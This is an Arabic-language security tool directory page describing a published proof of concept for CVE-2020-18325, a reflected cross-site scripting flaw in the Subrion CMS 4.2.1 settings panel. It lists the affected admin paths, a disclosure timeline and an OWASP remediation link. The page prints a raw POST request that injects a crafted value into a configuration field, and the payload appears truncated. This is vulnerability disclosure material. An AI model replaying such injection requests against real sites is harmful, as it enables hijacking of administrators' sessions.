Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2020-18325 — إثبات مفهوم لاستغلال ثغرات XSS المنعكسة في لوحة إعدادات Subrion CMS الإصدار 4.2.1، مع توضيح حقن JavaScript عبر طلبات POST. | Kitploit
أدوات/GitHubGitHub/hamm0nz/cve-2020-18325
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراقالتعلم والتعليم
GitHubhamm0nz/cve-2020-18325

CVE-2020-18325

إثبات مفهوم لاستغلال ثغرات XSS المنعكسة في لوحة إعدادات Subrion CMS الإصدار 4.2.1، مع توضيح حقن JavaScript عبر طلبات POST.

عرض المستودع
1منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

نقاط ضعف متعددة من نوع (XSS) موجودة في Intelliants Subrion CMS الإصدار 4.2.1 في لوحة الإعدادات.

الوصف

Subrion CMS سهل التثبيت وبسيط الإدارة. استخدمه كتطبيق مستقل أو بالاشتراك مع تطبيقات أخرى لإنشاء مواقع مستوى الدخول، أو مواقع متوسطة الحجم أو كبيرة.

تم اكتشاف نقاط ضعف متعددة من نوع Cross-site Scripting المنعكسة في لوحة إعدادات Subrion CMS v.4.2.1، مما يسمح لمهاجم عن بعد بحقن JavaScript عشوائي.

التاريخ: 27-02-2022
رابط البرنامج: https://subrion.org
مؤلف الاستغلال: HaMM0nz
CVE: CVE-2020-18325
التصنيف: تطبيق ويب
الروابط المتأثرة

  • /panel/configuration/pictures/
  • /panel/configuration/mail/
  • /panel/configuration/miscellaneous/
  • /panel/menus/add/

إثبات المفهوم

POST /panel/configuration/pictures/ HTTP/1.1
Host: 172.16.63.129
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://172.16.63.129/panel/configuration/pictures/
Content-Type: multipart/form-data; boundary=---------------------------17647740521660843247800008623
Content-Length: 5605 Connection: close Cookie: INTELLI_7da515443a=2hen33trbsgsadue2rgcti4sr1; loader=loaded Upgrade-Insecure-Requests: 1




-----------------------------17647740521660843247800008623
Content-Disposition: form-data; name="__st"

t9eQz0wrvfrlVO1rNDO9ZbPOB3mDmkNw8k17yS6f
-----------------------------17647740521660843247800008623
Content-Disposition: form-data; name="c[image_quality]"

1
-----------------------------17647740521660843247800008623
Content-Disposition: form-data; name="v[image_quality]"

75
-----------------------------17647740521660843247800008623
Content-Disposition: form-data; name="c[allow_animated_gifs]"
1
-----------------------------17647740521660843247800008623
Content-Disposition: form-data; name="v[allow_animated_gifs]"
0
-----------------------------17647740521660843247800008623
Content-Disposition: form-data; name="v[allow_animated_gifs]"
test">1qazx

الجدول الزمني

الاكتشاف والإبلاغ : 24 يونيو 2019
تم تعيين معرف CVE : 11 أغسطس 2021
عام : 27 فبراير 2022

الحل

ضع في اعتبارك الامتثال لإرشادات منع XSS من OWASP. (https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html)

تنزيل الأداة